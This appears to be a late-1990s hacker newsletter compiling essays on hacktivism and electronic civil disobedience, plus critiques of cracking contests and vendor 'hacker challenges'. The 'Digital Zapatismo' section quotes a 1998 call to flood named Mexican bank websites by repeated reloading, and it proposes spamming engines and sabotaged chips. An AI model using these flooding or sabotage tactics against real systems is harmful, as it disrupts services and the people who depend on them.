Again mentioning Mexico, in addition to the Electronic Civil Disobedience style action directed at the surface, at the web site entranceway, there have also been in 1998 actual hacks into Mexican government web sites where political messages have been added to those sites. 25 This particular tactic of accessing and altering web sites seems to have been the popular tactic for this year. Probably one of the most well known examples of this is the story of the young British hacker named "JF" who hacked into around 300 web sites world wide and placed anti-nuclear imagery and text. This method has been tried by a number of groups. October issues of the Ottawa Citizen and the New York Times did a decent job of capturing a number of these examples as they described this new trend. 26 One main distinction between most Politicized Hacking and the type of Electronic Civil Disobedience just mentioned is that while ECD actors don’t hide their names, operating freely and above board, most political hacks are done by people who wish to remain anonymous. It is also likely political hacks are done by individuals rather than by specific groups. One of the reasons for the anonymity and secrecy is that the stakes are higher. Where proponents of forms of electronic civil disobedience actions are perhaps in an ambiguous area of law, certain types of political hacks, used to varying degrees of success, are unquestionably illegal. Few will question the illegality of actually entering into an opponent's computer and adding or changing HTML code. This distinction speaks to a different style of organization. 
Because of the more secret, private, low key, and anonymous nature of the politicized hacks, this type of activity expresses a different kind of politics. It is not the politics of mobilization, nor the politics that requires mass participation. This is said not to pass judgement, but to illuminate that there are several important forms of direct action Net politics already being shaped. As touched on already, depending on the conception of politics, politicized hacking is either a recent phenomenon or one that can be traced back to hacking's origins. For the purposes of creating a portal to look into this world of extraparliamentarian direct action Net politics, it may be useful to consider both perspectives. There is clearly something political about early hackers' desires to make information free. It probably would be useful to examine the history of early to mid 1980s hacking to look for more political origins of today's hacktivism. The computerized activism of the mid to late 1980s existed alongside the first generation of hackers. There may have been cross-over then. The contemporary conception of hacktivism seems to concern itself more with overtly political hacking. It is such a recent development that journalists have only barely begun to discover it, while scholars have had little time to consider it. There are numerous web sites devoted to hacking, but very few are devoted to Hacktivism per se. One web site devoted to Hacktivism, however, was created in the fall of 1998 by a group called The Cult of the Dead Cow. 27 An important fact to realize and emphasize is that hacktivism, current forms of politicized hacking, is very much in its infancy. It is too early to draw definitive conclusions or to make strong predictions as to the direction it will take. Perhaps we can point to certain trajectories and make some logical projections. But we need to remember that at this point there is no consensus or agreement. 
Maybe the entire notion of hacktivism confuses and challenges sets of values and hacker codes of ethics. Quite possibly there is some re-thinking happening and we might begin to see a new set of ethical codes for hacking.28

Resistance to Future War

Some call the 1990-1991 Gulf War the first Information War because of the heavy military reliance on information and communication technology. The Gulf War was a pinnacle of achievement for the weapons industry, a chance to battle test sophisticated hardware that had been developed and manufactured under the Reagan and Bush presidencies. The weapons systems were dependent, as were all communications, on a major telecommunications infrastructure involving satellite, radar, radio, and telephone. The "smart" bombs were just the most mentioned of the sophisticated weaponry that was showcased during the made-for-CNN war. Although significantly under-reported by mainstream U.S. media, there was sizeable domestic opposition to the Gulf War, both prior to and especially during the first days of U.S. bombing of Iraq. In San Francisco, the first three days of the Gulf War are referred to as the Three Days of Rage. During that period, demonstrators filled, occupied, and controlled the streets and in some cases bridges and highways in the greater San Francisco Bay Area. Similar disruptions happened up and down the west coast and all across the country. There was widespread grassroots resistance to the U.S. bombardment of Iraq in January 1991.29 One part of that history is the role of information and communication technology, not just for the military forces, but also for the grassroots resistance. If the Gulf War is indicative of a paradigmatic shift toward the practice of Information Warfare, then it's also useful to look at the way in which ICT enabled resistance to the war effort. 
Some people within the opposition to the 1990-1991 Gulf War used email to communicate and they learned about resistance in other cities through Bulletin Board Systems and newsgroups. Others without computer access used fax and telephone. But many people had no connection to computers and received nothing by fax, instead they came out into the streets because of seeing posters or by hearing announcements on TV or on radio, or through word of mouth. It is safe to say that the Internet played only a marginal role in spreading news and moving people into action. The opposition to the war also watched CNN just like everyone else. But that was the end of 1990 and the very beginning of 1991, 8 years ago at the time of this writing, and in a pre-Web phase and even pre-Internet phase. Yes, by then the PC revolution had exploded and more and more people were buying modems, but the Gulf War is clearly positioned in the pre-boom days of the Internet in the United States. An interesting question is what would happen today, or moreover, what might happen tomorrow or in the near future, if presented with a similar set of circumstances. What if, for example, a Gulf War-like scenario emerged at the end of the year 2000 and the beginning of 2001? Suppose the United States decided to engage in what became an unpopular war, what might hacktivism look like in a condition of more generalized resistance? Or said another way, what might generalized resistance look like with the condition of hacktivism? The above is what is meant to be asked by suggesting that Resistance to Future War is the fifth portal into direct action Net politics. Where might this all lead? Until now, incidents of hacktivity have been sporadic and basically unconnected. Hacktivist events have been singular and not connected to a set of simultaneous occurrences. 
Perhaps the Electronic Disturbance Theater's work demonstrates the possibility of waging a campaign on the Internet, and sustaining a presence over a period of time. But the group's one goal of a SWARM has yet to be achieved. Maybe it is useful to think of the SWARM metaphor in the consideration of Resistance to Future War. Perhaps a SWARM is a convergence of generalized resistance, referring to a situation in which there are not just isolated cases, or several pockets of opposition, but when there is across-the-board resistance occurring at a number of different levels and happening in cities and towns all across the country, all at the same time. Such was the case during moments of domestic Gulf War resistance. There was a simultaneous outpouring of people into the streets who engaged in quite a range of activity, both legal and illegal. A multitude of tactics were being used at the same time but without any central command or directing orders from above. Incidents of such upsurge are rare, but they undoubtedly will occur again. What will hacktivism look like then? What of it when hacktivism moves from isolated incidents to a convergence of allied forces? Is this when hacktivism ceases to be and becomes cyberspacial resistance? While it may be too early to make accurate predictions, it seems true that the force or power of hacktivism has yet to be fully recognized or tested. Yet before getting lost in futuristic science fiction, consider some critiques.

Emerging Critiques of Direct Action Net Politics

There is no consensus among social and political activists regarding electronic civil disobedience, political hacking, hacktivism, or more generally extraparliamentarian direct action Net politics. It may in fact be too early to judge or to make definitive claims about these new tactics, but some critiques have co-developed along with the development of these new methods. 
They point to some basic questions over the effectiveness and appropriateness of these forms of electronic action. In an emerging discourse on several email listservs, that is too complicated to treat fairly in such a short piece as this one, there have been periodic criticisms raised both generally and specifically about aspects of the above mentioned tactics.30 By no means can this piece attempt to describe and comment on all criticisms being raised about hacktivism et al, but it can at least address several of the criticisms raised that seem most important. As already stated there are critiques aimed at the effectiveness and the appropriateness of cyber-protests. In terms of effectiveness, three closely related types of questions have appeared regarding political, tactical, and technical effectiveness. Concerning appropriateness there are ethical questions, that may be also considered as political questions, and of course there are legal questions. Some of the legal concerns raise issues of enforceability and prosecutability. Political and tactical effectiveness are closely intertwined. Are these methods of computerized activism effective? The answer is that it depends on how effectiveness is defined. What is effective? If the desired goal of hacktivism is to draw attention to particular issues by engaging in actions that are unusual and will attract some degree of media coverage, then effectiveness can be seen as being high. If, however, effectiveness is measured in terms of assessing the action's ability to be a catalyst for fomenting a more profound mobilization of people, then probably these new techniques are not effective. This distinction then, perhaps, is important. Hacktivism is not likely to be an organizing tool and the end result of hacktivity is not likely to be an increase in the ranks of the disaffected. 
Rather hacktivism appears to be a means to augment or supplement existing organizing efforts, a way to make some noise and focus attention. Technical critiques of hacktivism at the level of computer code are another way of addressing the efficacy of these new methods. Undoubtedly there will be disagreement as to how effective a particular technique is or isn't. But it seems that if new methods are created in an environment of experimentation, then valid critiques will be taken into consideration and used to redesign or alter plans and strategies. However, there are some technical critiques that are actually much more ideologically based than it would first seem. For example there is a certain tendency to reify bandwidth and from that viewpoint any action that clogs or diminishes bandwidth is considered negative. So then, technical critiques can be value-laden with particular stances toward the Internet infrastructure. Despite the current levels of political, tactical, and technical questions that are being raised about hacktivism et al, it seems to be an area that is in a period of expansion, rather than contraction. And it generally seems that this critique and questioning is healthy and useful for the refinement of the practice. As just mentioned, some technical critiques are bound together with ideological pre-dispositions and are therefore also political questions, and perhaps even ethical questions of appropriateness. To judge blocking a web site, or clogging the pipelines leading up to a web site, is to take an ethical position. If the judgement goes against such activity, such an ethical position is likely to be derived from an ethical code that values free and open access to information. But there are alternative sets of values that justify, for example, the blocking of access to web sites. 
These differences in beliefs over the nature of the Internet infrastructure are among people who are basically on the same side when it comes to most political questions. Some of these differences will probably be worked out as the subject and practice matures, while there may remain clear divisions. Last but not least, the more prosecutorial minded are apt to pass judgement on the appropriateness or inappropriateness of certain forms of hacktivism based on where the actions stand with respect to the law. While it is true that some forms of hacktivity are fairly easy to see as being outside the bounds of law - such as entering into systems to destroy data - there are other forms that are more ambiguous and hover much closer to the boundary between the legal and the illegal. Coupled with this ambiguity are other factors that tend to cloud the enforceability or prosecutability of particular hacktivist offenses. Jurisdictional factors are key here. The nature of cyberspace is extraterritorial. People can easily act across geographic political borders, as those borders do not show themselves in the terrain. Law enforcement is still bound to particular geographic zones. So there is a conflict between the new capabilities of political actors and the old system to which the law is still attached. This is already beginning to change and legal frameworks, at the international level, will be mapped on to cyberspace. This section does not do justice to the full range of critiques that can be identified and described, and further exploration of the subject of direct action Net politics should make sure such a deeper analysis is undertaken. The intention here has been more so to develop a greater understanding of these new forms of electronic action and to only mention a few overarching critiques so as to not give the impression that this is moving forward without resistance. Quite the contrary is true. It seems that hacktivity has met and will meet resistance from many quarters. 
It doesn't seem as if opposition to hacktivist ideas and practices falls along particular ideological lines either.

Conclusion

Several things seem to be clear at this point. The first is that hacktivism, as defined across the full spectrum from relatively harmless computerized activism to potentially dangerous resistance to future war, is a phenomenon that is on the rise. Second, as just alluded to, hacktivism represents a spectrum of possibilities that exists in some combination of word and deed. On the one end of the spectrum is pure word. On the other end of the spectrum is pure deed. Computerized activism hovers closer to pure word, while the successive portals move closer toward pure deed. Third, along with this tendency towards transgression, towards giving value to actions that move beyond words and that see the Internet infrastructure also as a site for action, there comes a critique and resistance. Despite this critique hacktivism is likely to continue to spread, but perhaps modified to accommodate some of the criticism. Fourth, with its continued spread, modified by critique or not, hacktivism is also likely to continue to gain attention. While media coverage may eventually drop off if or when hacktivism becomes more commonplace, at this point the way in which hacktivism is being represented is still new enough to warrant media attention for the foreseeable near future. What remains unclear about hacktivism emerges when we start to ask questions like: what does this mean and where is this going? While we can claim with a fair degree of certainty that hacktivism is on the rise, there is little way to tell where it will lead to and the significance or lack thereof that it will or might obtain. Moreover, there are aspects of hacktivism that still need to be explored. 
For example, the entire issue of extraterritoriality, of the Internet not being bound to any particular geographic region and the difficulties that poses for law enforcement, is one area that deserves further attention. One reason why it is difficult to get a firm grip on hacktivism's direction, in addition to simply saying that it is too early to tell, is that hacktivism will evolve in response to changing global economic and political conditions. As it is hard to predict trends and directions in the global economy, it too, then, becomes hard to predict events that will be linked to those meta shifts. Nevertheless, some people are trying to understand and make sense out of where hacktivism could go, although they might not be doing so using the particular word 'hacktivism' to describe this activity. Governments and corporations are keenly concerned, for example, about network security. To get some indications about the forecast for hacktivism in the 21st century it may be very useful to examine what these sorts of institutions are saying and how they are preparing to defend themselves. It could very well be that governments might impose severe regimes that successfully curtail hacktivism. If so, 1998 might be seen at some point as the glory days, when hacktivist experiments were able to go largely unchallenged, because the mechanisms of the state had not yet been in place to deal with the new phenomenon. Or it could be that hacktivism is able to successfully remain several steps out in front of law enforcement efforts, or that so many people become involved that enforceability remains problematic. Again, it is difficult to know any of this. Finally, while we can speak with some clarity about facets of hacktivism and also point to aspects of it that remain ambiguous and unforeseen, there is an overarching concern that comes from this discussion that deserves more attention. 
Specifically arising out of the consideration of the fifth portal, Resistance to Future War, what are the long term consequences posed for governments and states if individuals, non-state actors, can engage in forms of cyberspacial resistance across traditional geo-political borders? This is an important question raised by this discussion and one that demands more attention to answer properly. But it seems clear already that we are at the onset of a new way of thinking about, participating in, and resisting war, and that today's nascent hacktivity is part of the trajectory towards that new way.

Footnotes

1. Amy Harmon, "'Hacktivists' of All Persuasions Take Their Struggle to the Web," New York Times, 31 October 1998, sec. A1; Same in Carmin Karasic scrapbook (http://custwww.xensei.com/users/carmin/scrapbook/nyt103198/31hack.html)
2. John D. H Downing, "Computers for Political Change: PeaceNet and Public Data Access," Journal of Communication 39, no. 3 (Summer 1989): 154-62.
3. Harry Cleaver, "The Zapatistas and the International Circulation of Struggle: Lessons Suggested and Problems Raised," Harry Cleaver homepage 1998 (http://www.eco.utexas.edu/faculty/Cleaver/lessons.html)
4. Kenneth L. Hacker, "Missing links in the evolution of electronic democratization," Media, Culture & Society 18, (1996): 213-32; Lewis A. Friedland, "Electronic democracy and the new citizenship," Media, Culture & Society 18, (1996): 185-212; John Street, "Remote Control? Politics, Technology and 'Electronic Democracy'," European Journal of Communication 12, no. 1 (1997): 27-42.
5. John D. H Downing, "Computers for Political Change: PeaceNet and Public Data Access," Journal of Communication 39, no. 3 (Summer 1989): 154-62.
6. Linda M. Harasim, ed., Global Networks: Computers and International Communication (Cambridge, Mass.: MIT Press 1993)
7. There are many protest web sites. Try a search on the keywords "protest" and "web site" and there will be thousands of hits.
8. John Arquilla and David Ronfeldt, "Cyberwar is Coming!," Comparative Strategy 12 (April-June 1993): 141-65; (http://gopher.well.sf.ca.us:70/0/Military/cyberwar)
9. Harry Cleaver, "The Zapatistas and The Electronic Fabric of Struggle," Harry Cleaver homepage 1995 (http://www.eco.utexas.edu/faculty/Cleaver/zaps.html)
10. Gerfried Stocker and Christine Schopf, eds. InfoWar (Wien, Austria: Springer 1998); Ars Electronica Festival 1998 (http://www.aec.at/infowar)
11. Stefan Wray, "Towards Bottom-Up Information Warfare: Theory and Practice: Version 1.0," Electronic Civil Disobedience Archive 1998 (http://www.nyu.edu/projects/wray/BottomUp.html)
12. Stefan Wray, "The Drug War and Information Warfare in Mexico," Masters Thesis, University of Texas at Austin, Electronic Civil Disobedience Archive 1997 (http://www.nyu.edu/projects/wray/masters.html)
13. La Jornada (http://serpiente.dgsca.unam.mx/jornada/index.html)
14. Harry Cleaver, "Zapatistas in Cyberspace: An Accion Zapatista Report," Harry Cleaver homepage 1998 (http://www.eco.utexas.edu/faculty/Cleaver/zapsincyber.html)
15. No specific reference to this fact. But it is a matter of record.
16. Stefan Wray, "On Electronic Civil Disobedience," Peace Review 11, no. 1, (1999), forthcoming; Electronic Civil Disobedience archive 1998 (http://www.nyu.edu/projects/wray/oecd.html)
17. Critical Art Ensemble, The Electronic Disturbance (Brooklyn, NY: Autonomedia 1994); Critical Art Ensemble, Electronic Civil Disobedience and Other Unpopular Ideas (Brooklyn, NY: Autonomedia 1996); Critical Art Ensemble homepage (http://mailer.fsu.edu/~sbarnes/)
18. Stefan Wray, "Paris Salon or Boston Tea Party? Recasting Electronic Democracy, A View from Amsterdam," Electronic Civil Disobedience archive 1998 (http://www.nyu.edu/projects/wray/teaparty.html)
19. Electronic Disturbance Theater homepage (http://www.thng.net/~rdom/ecd/ecd.html)
20. Brett Stalbaum, "The Zapatista Tactical FloodNet," Electronic Civil Disobedience Web Page 1998 (http://www.nyu.edu/projects/wray/ZapTactFlood.html)
21. Ricardo Dominguez, "SWARM: An ECD Project for Ars Electronica Festival '98," Ricardo Dominguez homepage 1998 (http://www.thing.net/~rdom/)
22. Electronic Disturbance Theater, "Chronology of SWARM," (http://www.nyu.edu/projects/wray/CHRON.html)
23. "Email Message From DISA to NYU Computer Security," Electronic Civil Disobedience homepage (http://www.nyu.edu/projects/wray/memo.html)
24. Electronic Disturbance Theater's call for Electronic Civil Disobedience on November 22, 1998 (http://www.thing.net/~rdom/ecd/November22.html); (http://www.thing.net/~rdom/ecd/block.html)
25. "Mexico rebel supporters hack government home page," Reuters, 4 February 1998; Same in Electronic Civil Disobedience homepage (http://www.nyu.edu/projects/wray/real.html)
26. Amy Harmon, "'Hacktivists' of All Persuasions Take Their Struggle to the Web," New York Times, 31 October 1998, sec. A1; Same in Carmin Karasic scrapbook (http://custwww.xensei.com/users/carmin/scrapbook/nyt103198/31hack.html); Bob Paquin, "E-Guerrillas in the mist," The Ottawa Citizen, 26 October 1998 (http://www.ottawacitizen.com/hightech/981026/1964496.html)
27. Hacktivism web page (http://www.hacktivism.org); Cult of the Dead Cow homepage (http://www.cultdeadcow.com/)
28. While it is possible to point to certain early hacker ethical codes that, for example, privilege free and open access to all, there is not a monolithic hacker's perspective. Nevertheless, some who call themselves hackers have criticized the FloodNet project because one of the things they allege it does is block bandwidth. This view can be said to be a digitally correct position.
29. The author knows about grassroots resistance to the 1990/1991 Gulf War because he was involved in anti-war organizing and action in the San Francisco Bay Area during this period.
30. Some of these listservs include: nyfma@tao.ca, damn-org@tao.ca, media-l@tao.ca, accion-zapatista@mcfeeley.cc.utexas.edu

SP.02 "Digital Zapatismo"
~~~~~~~~~~~~~~~~~~~

Digital Zapatismo
http://www.freespeech.org/resistance/texts/DigZap.html
by Ricardo Dominguez
http://www.thing.net/~rdom/

Zapatismo has infected the political body of Mexico's "perfect dictatorship" since January 1, 1994. This polyspacial movement for a radical democracy based on the Mayan legacies of dialogue ripped into the electronic fabric not as InfoWar--but as virtual actions for real peace in the real communities of Chiapas.

As of September 1997 reports of the Mexican military training and arming paramilitary groups with the intent of moving the "low-intensity" war to a higher level began to circulate among the Zapatista Network. It took the massacres at Acteal to focus the world on something that was already known--the constant tragedy of late-capital. As manifestations took place around the world in remembrance of the Acteal dead on January 1 and 2nd, the Mexican military with the full support of the PRI government began the next stage of the war against peace. As the West stumbled about in celebration of a new year--the first report reached out across the net and slapped us awake once more with the brutal reality of the neo-liberal agenda.

1.0 Beta Actions

This time Zapatista Networks responded with a new level of electronic civil disobedience beyond the passing of information and emailing presidents. On Sunday the 18th of January 1998 a call for NetStriking for Zapata (from Anonymous Digital Coalition) came in via email with the following instructions:

In solidarity with the Zapatista movement we welcome all netsurfers with ideals of justice, freedom, solidarity and liberty within their hearts, to a virtual sit-in. On January 29, 1998 from 4:00 p.m. GMT (Greenwich Mean Time) to 5:00 p.m.
(in the following five web sites, symbols of Mexican neoliberalism):

Bolsa Mexicana de Valores: http://www.bmv.com.mx
Grupo Financiero Bital: http://www.bital.com.mx
Grupo Financiero Bancomer: http://www.bancomer.com.mx
Banco de Mexico: http://www.banxico.org.mx
Banamex: http://www.banamex.com

Technical instructions: Connect with your browser to the upper mentioned web sites and push the button "reload" several times for an hour (with in between an interval of few seconds).

This virtual sit-in not only brought the possibilities of direct electronic actions to the forefront of the Zapatista networks, it also initiated a more focused analysis of what methods of electronic civil disobedience might work. Several questions were brought up on the issues of net traffic, ISPs, and small international pipes. Speculations on the technological implications of these actions began to focus on the question of who is most likely to be damaged by this move: the Mexican target banks or the Internet Service Providers (ISPs) who route data to these banks?

As these discussions were taking place a group of Mexican digital activists on February 4, 1998 hacked into a Mexican government home page on the Internet and placed pro-Zapatista slogans on the front pages of the site. Soon afterwards an MS-DOS Ping Action program from the ECD group arrived to hit Mexican Banks and Chase Manhattan Bank on February 9. The next level of possible ECD began to emerge at the end of February: an automatic mail engine from the New Humans and Java based site that automatically began to PING the British Mexican Embassy URL every 7 seconds once you logged-in.

2.0 InfoWar

To move beyond these Beta actions we need to map the general condition of InfoWar at this shifting point in time. Command and control systems (CCS) within the Military and Intelligence Communities have been re-shifting their definition of war for some time. That surveillance systems like Project Echelon would become a priority is no surprise.
The NSA (National Security Agency) and the NRO (National Reconnaissance Office) have been working on implementing new functions for themselves since the end of the post-Cold War. They had to re-invent themselves into hyper-surveillance networks that can accomplish defensive intelligence gathering and rapid containment missions for the lowest cost possible.

Now it is more important to attack an opponent's information infrastructure than it is to destroy its armies. Actions, like the Gulf War, are now only useful for limited screenal political gambits. The enemy is now hosted by the global public commercial networks. InfoWar tactics must now maintain a constant analysis of all information flows and a continuous tracking of the backbone routes, in search of the most effective way to bring down specific zones of resistance within an enemy's political or economic structures:

1. Commercial communication systems.
2. Broadcasting networks.
3. Financial data systems.
4. Transportation systems.
5. Internet Server networks.

Of course one of the problems faced by these IW scenarios is that military and intelligence systems here are also routed within public commercial lines. The scenarios of possible implosions faced by the decentralization of command and control are increasing at a co-equal rate with the speed of access to hardware, software, and training. Late Capital demands that this equation grow even faster and to the farthest reaches of the globe. The necessity of the rule of association and strategic coalitions between military and intelligence networks with mega corporation webs, universities, independent ISPs, electronic political cells, individual research and analysis creates a general state of pan-anarchy.

Thus IWW (Information World War) has already started and it is haunted by its own shadow. It must face the task of dealing with an open network that has at least 5 vulnerabilities:

1. Bottom-up architecture.
2. Multiple distribution points.
3. Memetic networks (MMN): independent networks which coordinate without the unification of a central command.
4. Non linearity and complexity effects: where simple interactions lead to unpredictable outcomes.
5. Constant states of emergency: all systems are always already not enough and must be constantly upgraded.

In order to deal with this growing vulnerability of the electronic infrastructure with the onset of InfoWar, the State has redefined command, control, intelligence and resistance. InfoWar tactics are now moving beyond the theoretical questions about the rise of "network power" and the end of hierarchies. Instead, Military and Intelligence groups are now experimenting with pragmatic hybrid structures that can retain control over networks, while allowing network autonomy to expand within specific types of command structures, in order to contain the rising soft power of small groups that can organize themselves "into sprawling networks" threatening hard power structures.

3.0 Hacking the Future

Digital Zapatismo has always been an open system of sprawling networks--this has been the force multiplier of the movement. It used digital culture's most basic system of exchange, e-mail between people, to disturb the Informatic State. Now that we know that they are using, as we always suspected, hyper-surveillance filters to regain control of the network, we must begin to invent other methods of Electronic Civil Disobedience:

1. Alternative networks with more access and bandwidth. More projects like Name.space attacking the control of the root.name structures by Internic.
2. Deep programming: Creating Spiders, Bots, and other (minor network agents) to move against specific URLs without interrupting the Server. The first Zapatista Spider should be available by the end of May.
3. Offshore Domains: To maintain spamming engines for massive e-mail actions.
4. Virtual proximity capabilities: Create simple access systems for Real Time intercontinental electronic communication.
These types of systems would disable the possibility of surveillance. A prototype has been developed by Thing.net--The Thing Connector 3.0.
5. Satellites: To gather a fund among alternative networks to buy our own satellite, giving us autonomy from controlled networks and backbones. The Nettime community has been discussing the possibility.
6. Jamming Chips: Jamming by highly trained cells could systematically disrupt wide areas of sensitive networks. These micro-squads could slip basic disturbances into the chips bought by the U.S military-entertainment complex from foreign countries. Many of these elements are part of a wide range of defensive and offensive weapon systems--that could induce a general dysfunction in performance at a pre-set time.

The Zapatista Networks, in the spirit of Chiapas, are developing methods of electronic disturbance as sites of invention and political action for peace. At this point in time it is difficult to know how much of a disturbance these acts of electronic civil disobedience specifically make. What we do know is that neoliberal power is extremely concerned by these acts. Since Jan 1, 1994 the analysis of the Zapatista Electronic Movement has been at the top of the list of the Military and Intelligence research agenda.

For now all we can do is continue to forge ahead and always remember that all of this electronic activism is about a real community in search of a real peace. A community that has been calling for a world that makes all worlds possible.

@copyleft Electronic Civil Disobedience Homepage

@HWA

SP.C1 The Phallusy of cracking contests, (how big is yours?)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Fallacy of Cracking Contests

You see them all the time: "Company X offers $1,000,000 to anyone who can break through their firewall/crack their algorithm/make a fraudulent transaction using their protocol/do whatever."
These are cracking contests, and they're supposed to show how strong and secure the targets of the contests are. The logic goes something like this: We offered a prize to break the target, and no one did. This means that the target is secure.

It doesn't.

Contests are a terrible way to demonstrate security. A product/system/protocol/algorithm that has survived a contest unbroken is not obviously more trustworthy than one that has not been the subject of a contest. The best products/systems/protocols/algorithms available today have not been the subjects of any contests, and probably never will be. Contests generally don't produce useful data. There are three basic reasons why this is so.

1. The contests are generally unfair.

Cryptanalysis assumes that the attacker knows everything except the secret. He has access to the algorithms and protocols, the source code, everything. He knows the ciphertext and the plaintext. He may even know something about the key. And a cryptanalytic result can be anything. It can be a complete break: a result that breaks the security in a reasonable amount of time. It can be a theoretical break: a result that doesn't work "operationally," but still shows that the security isn't as good as advertised. It can be anything in between.

Most cryptanalysis contests have arbitrary rules. They define what the attacker has to work with, and how a successful break looks. Jaws Technologies provided a ciphertext file and, without explaining how their algorithm worked, offered a prize to anyone who could recover the plaintext. This isn't how real cryptanalysis works; if no one wins the contest, it means nothing.

Most contests don't disclose the algorithm. And since most cryptanalysts don't have the skills for reverse-engineering (I find it tedious and boring), they never bother analyzing the systems.
This is why COMP128, CMEA, ORYX, the Firewire cipher, the DVD cipher, and the Netscape PRNG were all broken within months of their disclosure (despite the fact that some of them have been widely deployed for many years); once the algorithm is revealed, it's easy to see the flaw, but it might take years before someone bothers to reverse-engineer the algorithm and publish it. Contests don't help.

(Of course, the above paragraph does not hold true for the military. There are countless examples of successful reverse-engineering--VENONA, PURPLE--in the "real" world. But the academic world doesn't work that way, fortunately or unfortunately.)

Unfair contests aren't new. Back in the mid-1980s, the authors of an encryption algorithm called FEAL issued a contest. They provided a ciphertext file, and offered a prize to the first person to recover the plaintext. The algorithm has been repeatedly broken by cryptographers, through differential and then linear cryptanalysis and by other statistical attacks. Everyone agrees that the algorithm was badly flawed. Still, no one won the contest.

2. The analysis is not controlled.

Contests are random tests. Do ten people, each working 100 hours to win the contest, count as 1000 hours of analysis? Or did they all try the same things? Are they even competent analysts, or are they just random people who heard about the contest and wanted to try their luck? Just because no one wins a contest doesn't mean the target is secure...it just means that no one won.

3. Contest prizes are rarely good incentives.

Cryptanalysis of an algorithm, protocol, or system can be a lot of work. People who are good at it are going to do the work for a variety of reasons--money, prestige, boredom--but trying to win a contest is rarely one of them. Contests are viewed in the community with skepticism: most companies that sponsor contests are not known, and people don't believe that they will judge the results fairly.
And trying to win a contest is no sure thing: someone could beat you, leaving you nothing to show for your efforts. Cryptanalysts are much better off analyzing systems where they are being paid for their analysis work, or systems for which they can publish a paper explaining their results.

Just look at the economics. Taken at a conservative $125 an hour for a competent cryptanalyst, a $10K prize pays for two weeks of work, not enough time to even dig through the code. A $100K prize might be worth a look, but reverse-engineering the product is boring and that's still not enough time to do a thorough job. A prize of $1M starts to become interesting, but most companies can't afford to offer that. And the cryptanalyst has no guarantee of getting paid: he may not find anything, he may get beaten to the attack and lose out to someone else, or the company might not even pay. Why should a cryptanalyst donate his time (and good name) to the company's publicity campaign?

Cryptanalysis contests are generally nothing more than a publicity tool. Sponsoring a contest, even a fair one, is no guarantee that people will analyze the target. Surviving a contest is no guarantee that there are no flaws in the target.

The true measure of trustworthiness is how much analysis has been done, not whether there was a contest. And analysis is a slow and painful process. People trust cryptographic algorithms (DES, RSA), protocols (Kerberos), and systems (PGP, IPSec) not because of contests, but because all have been subjected to years (decades, even) of peer review and analysis. And they have been analyzed not because of some elusive prize, but because they were either interesting or widely deployed. The analysis of the fifteen AES candidates is going to take several years.
There isn't a prize in the world that's going to make the best cryptanalysts drop what they're doing and examine the offerings of Meganet Corporation or RPK Security Inc., two companies that recently offered cracking prizes. It's much more interesting to find flaws in Java, or Windows NT, or cellular telephone security.

The above three reasons are generalizations. There are exceptions, but they are few and far between. The RSA challenges, both their factoring challenges and their symmetric brute-force challenges, are fair and good contests. These contests are successful not because the prize money is an incentive to factor numbers or build brute-force cracking machines, but because researchers are already interested in factoring and brute-force cracking. The contests simply provide a spotlight for what was already an interesting endeavor. The AES contest, although more a competition than a cryptanalysis contest, is also fair.

Our Twofish cryptanalysis contest offers a $10K prize for the best negative comments on Twofish that aren't written by the authors. There are no arbitrary definitions of what a winning analysis is. There is no ciphertext to break or keys to recover. We are simply rewarding the most successful cryptanalysis research result, whatever it may be and however successful it is (or is not). Again, the contest is fair because 1) the algorithm is completely specified, 2) there are no arbitrary definitions of what winning means, and 3) the algorithm is public domain.

Contests, if implemented correctly, can provide useful information and reward particular areas of research. But they are not useful metrics to judge security. I can offer $10K to the first person who successfully breaks into my home and steals a book off my shelf. If no one does so before the contest ends, that doesn't mean my home is secure. Maybe no one with any burgling ability heard about my contest. Maybe they were too busy doing other things.
Maybe they weren't able to break into my home, but they figured out how to forge the real-estate title to put the property in their name. Maybe they did break into my home, but took a look around and decided to come back when there was something more valuable than a $10,000 prize at stake. The contest proved nothing.

SP.C2 Hacker challenges: Boon or Bane by Gene Spafford
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Hacker Challenges -- Boon or Bane?

(From Cipher, an infowar publication located at http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/old-issues/issue9602 - Ed)

Commentary by Gene Spafford, with responses from Sameer Parekh, Jon Wiederspan, and Jeff Weinstein
______________________________________________________________________

In the past year, several businesses have made resources publicly available on the Internet and challenged all comers to find bugs in them or break into them. Incentives offered to those who reported valid break-ins or bugs have ranged from T-shirts to cold cash. Recently, Gene Spafford of Purdue University decried this growing practice in a message circulated widely on the Internet. Cipher has obtained responses from some of the organizations who have sponsored challenges of one sort or another, and is circulating them along with that note. We thank Prof. Spafford and the organizations who responded to our request for comments.

A Few Comments on "Hacker Challenges"
+++++++++++++++++++++++++++++++++++++
by Eugene H. Spafford, COAST Laboratory Director, Purdue University
http://www.cs.purdue.edu/people/spaf

I note with dismay the increasing number of "hacker challenges" used in marketing security products. I think these are actually harmful to the profession and practice of security, rather than helpful.
I believe the harm comes in two ways: (1) the challenges don't serve as any real test of the products, and it denigrates security professionals by suggesting that they should accept them as proof of security; and (2) it helps reinforce the image that there should be some form of reward for hacking through security measures. Neither of these are views we should responsibly seek to promote.

Consider the nature of showing the security of a product. Does a "challenge" meet the goal of testing, which is to increase one's confidence in the correct functioning of the artifact? It really doesn't, for a number of reasons:

o Few such "challenges" are conducted using established testing techniques. They are ad hoc, random tests. Thus, there is no way of determining final coverage. For instance, if 90% of all challenge attacks are of the same variety, what has the "test" really shown? (Consider testing a calculator. If you perform 10,000 tests, but 9000 of them are addition with zero, have you done a thorough job of testing?)

o That no problems are found does not mean that no problems exist. It may mean that the testers didn't expose them. Doing random, black-box testing remotely is not likely to really test much of the product. (Challenge testing is basically a form of black-box testing.)

o That no problems are reported does not mean that no problems exist. The "testers" might not have recognized them. (Look at how often software is released with bugs, even after careful scrutiny -- users don't always recognize anomalies.)

o That no problems are reported does not mean that no problems exist. How do you know that the "testers" will report what they find? How do you know the vendor is getting accurate data? If Jane Random Hacker found a way to penetrate the product in a manner that vendor monitoring didn't expose, it is possible she'd find more profitable uses (later) for that information than informing the vendor about it.
Further, because of possible problems with the law, hackers might not want to report success and draw attention to themselves.

o Simply because the vendor does not report a successful penetration does not mean that one did not occur -- the vendor may choose not to report it because it would reflect poorly on its product, or not meet the narrow criteria for a "successful" penetration, or the vendor may not be able to detect it happened. (How can anyone outside prove otherwise?)

